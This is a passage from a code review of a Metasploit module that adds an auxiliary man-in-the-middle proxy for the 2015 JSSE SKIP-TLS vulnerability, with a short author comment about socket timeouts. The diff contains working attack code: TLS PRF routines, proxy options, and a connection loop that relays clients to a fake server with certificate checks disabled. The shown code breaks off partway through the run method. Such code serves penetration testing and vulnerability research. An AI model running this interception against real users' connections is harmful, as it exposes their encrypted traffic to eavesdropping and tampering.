modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb

```diff
@@ -0,0 +1,248 @@
+        ['URL', 'https://www-304.ibm.com/support/docview.wss?uid=swg21695474']
+      ],
+      'DisclosureDate' => 'Jan 20 2015'
+    )
+
+    register_options(
+      [
+        OptString.new('FAKEHOST', [ false, 'The fake server address', nil]),
+        OptString.new('FAKEPORT', [ false, 'The fake server port', 443]),
+        OptString.new('HOST', [ true, 'The server address', nil]),
+        OptString.new('PORT', [ true, 'The server port', 443]),
+        OptString.new('SRVHOST', [ true, 'The proxy address', '0.0.0.0']),
+        OptString.new('SRVPORT', [ true, 'The proxy port', 443]),
+        OptInt.new('TIMEOUT', [ true, 'The timeout, in seconds', 5])
+      ], self.class)
+  end
+
+  def PRF(secret, label, seed)
+    if secret.empty?
+      s1 = s2 = ''
+    else
+      length = ((secret.length * 1.0) / 2).ceil
+      s1 = secret[0..(length - 1)]
+      s2 = secret[(length - 1)..(secret.length - 1)]
+    end
+
+    hmac_md5 = OpenSSL::HMAC.digest(OpenSSL::Digest.new('md5'), s1, label + seed)
+    hmac_sha = OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha1'), s2, label + seed)
+
+    hmac_md5 = OpenSSL::HMAC.digest(OpenSSL::Digest.new('md5'), s1, hmac_md5 + label + seed)
+    hmac_sha = OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha1'), s2, hmac_sha + label + seed)
+
+    result = ''
+    [hmac_md5.length, hmac_sha.length].max.times { |i| result << [(hmac_md5.getbyte(i) || 0) ^ (hmac_sha.getbyte(i) || 0)].pack('C') }
+    result
+  end
+
+  def PRF_SHA256(secret, label, seed)
+    hmac_hash = OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha256'), secret, label + seed)
+    OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha256'), secret, hmac_hash + label + seed)
+  end
+
+  def run
+    fake_host = datastore['FAKEHOST'] || datastore['HOST']
+    fake_port = datastore['FAKEPORT'] || datastore['PORT']
+    host = datastore['HOST']
+    local_host = datastore['SRVHOST']
+    local_port = datastore['SRVPORT']
+    port = datastore['PORT']
+    timeout = datastore['TIMEOUT']
+
+    proxy = TCPServer.new(local_host, local_port)
+    print_status('Listening on %s:%d' % [proxy.addr[2], proxy.addr[1]])
+
+    loop do
+      Thread.start(proxy.accept) do |client|
+      #loop do
+        finished_sent = false
+        handshake_messages = ''
+        application_data = ''
+
+        #client = proxy.accept
+
+        print_status('Accepted connection from %s:%d' % [client.addr[2], client.addr[1]])
+
+        context = OpenSSL::SSL::SSLContext.new(:TLSv1_2)
+        context.verify_mode = OpenSSL::SSL::VERIFY_NONE
+
+        tcp_socket = TCPSocket.new(fake_host, fake_port)
+        fake_server = OpenSSL::SSL::SSLSocket.new(tcp_socket, context)
+        fake_server.connect
+
+        print_status('Connected to %s:%d' % [fake_host, fake_port])
+
+        server = Socket.new(Socket::AF_INET, Socket::SOCK_STREAM)
+
+        begin
+          server.connect_nonblock(Socket.pack_sockaddr_in(port, host))
```

Comment:
It was written and tested on OS X. Not sure about Windows though. TCPSocket has a similar construct for the connect_timeout option, see https://redmine.ruby-lang.org/issues/5101.

I just removed the timeout option since I haven't done it for the SSL socket anyway.